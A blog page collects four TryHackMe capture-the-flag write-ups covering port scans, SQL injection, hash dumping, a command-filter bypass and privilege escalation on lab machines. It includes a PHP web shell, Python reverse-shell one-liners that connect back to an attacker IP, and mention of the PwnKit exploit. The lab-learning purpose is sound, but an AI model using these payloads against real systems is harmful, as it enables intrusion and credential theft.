0xShushu

Madeye’s castle - TryHackMe write-up

2022-06-04T00:00:00+00:00

Write-up for Madeye’s Castle TryHackMe CTF

Hi hackers, today I’m gonna write-up Madeye’s castle, a medium TryHackMe CTF.

User

Fist, I did port scanning with rustscan and nmap

$ rustscan -a madeye.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ubuntu/.rustscan.toml" 
Open 10.10.220.41:22
Open 10.10.220.41:80
Open 10.10.220.41:139
Open 10.10.220.41:445
$ nmap -p22,80,139,445 -A -T4 -oN port.txt madeye.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-04 18:35 CEST
Nmap scan report for madeye.thm (10.10.220.41)
Host is up (0.11s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:5f:48:fa:3d:3e:e6:9c:23:94:33:d1:8d:22:b4:7a (RSA)
|   256 53:75:a7:4a:a8:aa:46:66:6a:12:8c:cd:c2:6f:39:aa (ECDSA)
|_  256 7f:c2:2f:3d:64:d9:0a:50:74:60:36:03:98:00:75:98 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: Amazingly It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: HOGWARTZ-CASTLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: hogwartz-castle
|   NetBIOS computer name: HOGWARTZ-CASTLE\x00
|   Domain name: \x00
|   FQDN: hogwartz-castle
|_  System time: 2022-06-04T16:35:58+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-06-04T16:35:58
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.84 seconds

We had three services: SSH (22), HTTP(80) and SMB(139, 445), so I started testing SMB. Fisrt I enumerated available share

$ smbclient -L \\\\madeye.thm\\
Enter WORKGROUP\ubuntu's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	sambashare      Disk      Harry's Important Files
	IPC$            IPC       IPC Service (hogwartz-castle server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

I noticed sambashare so I connected and downloaded all files contained:

$ smbclient -N \\\\madeye.thm\\sambashare\\
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 02:19:20 2020
  ..                                  D        0  Thu Nov 26 01:57:55 2020
  spellnames.txt                      N      874  Thu Nov 26 02:06:32 2020
  .notes.txt                          H      147  Thu Nov 26 02:19:19 2020

		9219412 blocks of size 1024. 4411804 blocks available

File spellnames.txt contained a wordlist whereas .notes.txt contained the following:

Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.

After that I started enumerating HTTP, who was hosting apache default page

But I found something interesting by looking at source code:

There’s a vhost hogwartz-castle.thm so I added it into /etc/hosts and started testing

It was hosting a login page, so I tested SQL injection, LDAP injection, XPATH injection and so on; It was vulnerable to SQL injection

user=x ' or 1=1-- -&password=x

And it redirect me to a json

{"error":"The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging"}

So I enumerated tables with SQLmap and it found one table

$ sqlmap -u "http://hogwartz-castle.thm/login" --data="user=x&password=x" -p user --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.9#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:59:56 /2022-06-04/

[18:59:56] [INFO] resuming back-end DBMS 'sqlite' 
[18:59:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-5956' OR 9310=9310-- XEXb&password=x
---
[18:59:56] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[18:59:56] [INFO] fetching tables for database: 'SQLite_masterdb'
[18:59:56] [INFO] fetching number of tables for database 'SQLite_masterdb'
[18:59:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:59:57] [INFO] retrieved: 
[1 table]
+-------+
| users |
+-------+

After that I dumped table users

$ sqlmap -u "http://hogwartz-castle.thm/login" --data="user=x&password=x" -p user -T users --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.9#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:02:19 /2022-06-04/

[19:02:19] [INFO] resuming back-end DBMS 'sqlite' 
[19:02:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-5956' OR 9310=9310-- XEXb&password=x
---
[19:02:19] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[19:02:19] [INFO] resumed: CREATE TABLE users(\nname text not null,\npassword text not null,\nadmin int not null,\nnotes text not dddd)
[19:02:19] [INFO] fetching entries for table 'users'
[19:02:19] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[19:02:19] [INFO] resumed: 40
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Lucas Washington
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Harry Turner
[19:02:19] [INFO] resumed: My linux username is my first name, and password uses best64
[19:02:19] [INFO] resumed: b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Andrea Phillips
[19:02:19] [INFO] resumed:  contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: e1ed732e4aa925f0bf125ae8ed17dd2d5a1487f9ff97df63523aa481072b0b5ab7e85713c07e37d9f0c6f8b1840390fc713a4350943e7409a8541f15466d8b54
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Liam Hernandez
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: 5628255048e956c9659ed4577ad15b4be4177ce9146e2a51bd6e1983ac3d5c0e451a0372407c1c7f70402c3357fc9509c24f44206987b1a31d43124f09641a8d
[19:02:19] [INFO] resumed: 0
[19:02:19] [INFO] resumed: Adam Jenkins
[19:02:19] [INFO] resumed: contact administrator. Congrats on SQL injection... keep digging
[19:02:19] [INFO] resumed: 2317e58537e9001429caf47366532d63e4e37ecd363392a80e187771929e302922c4f9d369eda97ab7e798527f7626032c3f0c3fd19e0070168ac2a82c953f7b
[19:02:19] [INFO] resumed: 0

I noticed the comment of the user Harry Turner so I cracked his hash using this web tool

So I logged into SSH using credentials harry:wingardiumleviosa123

$ ssh harry@madeye.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.220.41' to the list of known hosts.
harry@madeye.thm's password: 
 _      __    __                     __         __ __                          __
 | | /| / /__ / /______  __ _  ___   / /____    / // /__  ___ __    _____ _____/ /____
 | |/ |/ / -_) / __/ _ \/  ' \/ -_) / __/ _ \  / _  / _ \/ _ `/ |/|/ / _ `/ __/ __/_ /
 |__/|__/\__/_/\__/\___/_/_/_/\__/  \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/  \__//__/
                                                        /___/

Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$ 

We got user!

Root

When shell was obtained I needed to get root so I started enumerating OS and found something into Linux version

$ uname -a
Linux hogwartz-castle 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

It’s running a vulnerable kernel so I uploaded PwnKit into the machine and run it

It worked, we got root! See you at the next post, keep hacking

CyberHeroes - TryHackMe Write-up

2022-05-28T00:00:00+00:00

Write-up for CyberHeroes TryHackMe CTF

Hi hackers, today I’m gonna write-up CyberHeroes, a medium TryHackMe CTF.

Flag

First, I did port scanning with rustscan and nmap to find any open ports

$ rustscan -a cyberheroes.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/ubuntu/.rustscan.toml"
Open 10.10.40.61:22
Open 10.10.40.61:80

$ nmap -p22,80 -A -oN port.txt -T4 cyberheroes.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-28 20:36 CEST
Nmap scan report for cyberheroes.thm (10.10.40.61)
Host is up (0.32s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.48 ((Ubuntu))
|_http-server-header: Apache/2.4.48 (Ubuntu)
|_http-title: CyberHeros : Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds

We have two open ports: 22 (SSH) and 80 (HTTP) so I started testing HTTP.

HTTP is hosting a web site called CyberHeroes, I immediately noticed the login page

That login use a javascript authentication, here’s its source code:

function authenticate() {
      a = document.getElementById('uname')
      b = document.getElementById('pass')
      const RevereString = str => [...str].reverse().join('');
      if (a.value=="h3ck3rBoi" & b.value==RevereString("54321@terceSrepuS")) { 
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
          if (this.readyState == 4 && this.status == 200) {
            document.getElementById("flag").innerHTML = this.responseText ;
            document.getElementById("todel").innerHTML = "";
            document.getElementById("rm").remove() ;
          }
        };
        xhttp.open("GET", "RandomLo0o0o0o0o0o0o0o0o0o0gpath12345_Flag_"+a.value+"_"+b.value+".txt", true);
        xhttp.send();
      }
      else {
        alert("Incorrect Password, try again.. you got this hacker !")
      }
    }

That script checks if the username is equal to h3ck3rBoi and if the username is equal to RevereString(“54321@terceSrepuS”), so the username is h3ckerBoi whereas to get password’s value we can execute the piece of script which reverse the string by using node, here’s is result:

$ node
Welcome to Node.js v12.22.5.
Type ".help" for more information.
> const RevereString = str => [...str].reverse().join('');
undefined
> RevereString("54321@terceSrepuS")
'[REDACTED]'
> 

Now we have username and password, let’s login

here’s our flag! See you at the next post, keep hacking

Chill hack - TryHackMe write-up

2022-05-09T00:00:00+00:00

Write-up for Chill hack TryHackMe CTF

Hi hackers, today I’m gonna write-up chill hack, an easy TryHackMe CTF.

User

First, I did port scanning with rustscan and nmap to find any open ports ()

$ rustscan -a chillhack.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

Open 10.10.161.188:21
Open 10.10.161.188:22
Open 10.10.161.188:80

$ nmap -p21,22,80 -A -oN port.txt chillhack.thm
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.53.247
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

After that I started enumerating all services starting from FTP, port 21 was hosting an FTP server allowing anonymous access so I connected and downloaded all file

$ ftp chillhack.thm$ ftp chillhack.thm
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 03  2020 .
drwxr-xr-x    2 0        115          4096 Oct 03  2020 ..
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.

note.txt contained the following content:

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

Then, I started testing HTTP (port 80) who was hosting the following static web page: That page contained nothing of useful so I did a directory bruteforce with dirsearch

$ dirsearch -u http://chillhack.thm -w $LIST/directory/dir.txt -t 50 -o directory.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 329449

Output File: /home/ubuntu/ctf/tmp/directory.txt

Error Log: /home/ubuntu/.local/lib/python3.9/site-packages/dirsearch/logs/errors-22-05-09_21-24-51.log

Target: http://chillhack.thm/

[21:24:52] Starting: 
[21:25:14] 301 -  312B  - /css  ->  http://chillhack.thm/css/
[21:25:29] 301 -  314B  - /fonts  ->  http://chillhack.thm/fonts/
[21:25:38] 301 -  315B  - /images  ->  http://chillhack.thm/images/
[21:25:41] 301 -  311B  - /js  ->  http://chillhack.thm/js/
[21:26:03] 301 -  315B  - /secret  ->  http://chillhack.thm/secret/
[21:26:04] 403 -  278B  - /server-status
[21:26:19] 200 -   34KB - /index.html

Task Completed
<dirsearch.dirsearch.Program object at 0x7f7cbef0b730>

I noticed the page secret and found it contained a remote code execution, I tried to execute some command but there’s a filter blocking our commands

to bypass this filter we can use backslash

now we can spawn a reverse shell to get user, here’s mine:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your IP>",<your port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

Root

After getting user I started finding somethings to get root, and I found something interesting in OS version:

www-data@ubuntu:/tmp$ uname -a
Linux ubuntu 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

It’s vulnerable to CVE-2021-4034, so I uploaded PwnKit onto the server and run it

It worked, we got root! See you at the next post, keep hacking

Gallery - TryHackMe write-up

2022-04-24T00:00:00+00:00

Write-up for Gallery TryHackMe CTF

Hi hackers, today I’m gonna writeup gallery, an easy TryHackMe CTF.

User

First I did some port scanning with rustscan and nmap (learn here more about port scanning)

$ rustscan -a gallery.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/ubuntu/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.241.136:80
Open 10.10.241.136:8080
$ nmap -p80,8080 -A -oN port.txt -T4 gallery.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 16:44 CEST
Nmap scan report for gallery.thm (10.10.241.136)
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds

Rustscan found two open ports 80 and 8080, apache default pages was hosted on port 80

So, I enumerated directory with dirsearch

$ dirsearch -u http://gallery.thm -w $LIST/directory/dir.txt -o directory

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 329449

Output File: /home/ubuntu/ctf/tmp/80/directory

Error Log: /home/ubuntu/.local/lib/python3.9/site-packages/dirsearch/logs/errors-22-04-24_16-56-02.log

Target: http://gallery.thm/

[16:56:02] Starting: 
[16:56:42] 301 -  312B  - /gallery  ->  http://gallery.thm/gallery/
[16:57:21] 403 -  276B  - /server-status
[16:57:51] 200 -   11KB - /index.html

Task Completed
<dirsearch.dirsearch.Program object at 0x7f8e6d9c7700>

The directory gallery redirect to a login page

I checked if it was vulnerable to LDAP injection, SQL injection, XPath injection and it was vulnerable to SQL injection

and I gain access to the admin panel. Then, I started testing admin panel function and I noticed a function allowing upload avatar image so I tried uploading this web shell:

<?php
	$cmd=$_GET["cmd"];
	echo system("$cmd");
?>

It worked! Then I started a listener on my machine with nc:

$ rlwrap nc -nlvp 4444

and I executed the following reverse shell on the web shell I uploaded:

$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.53.247",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

So I got a reverse shell Then I run linpeas to find somethings, and it found mike’s password:

it worked and I got user.txt

Getting admin hash

We also need to find admin hash, so I started looking for database password in web root and I found a file called initialize.php containing it Then we can log in database and dump users’ hashes

We got it!

Root

Once we got user.txt our goal is to get root, running sudo -l I noticed we can executed /opt/rootkit.sh as root

/opt/rootkit.sh allows us to execute nano as root if we select option read, we can exploit it to spawn a root shell

It worked, we got root!

See you at the next post, keep hacking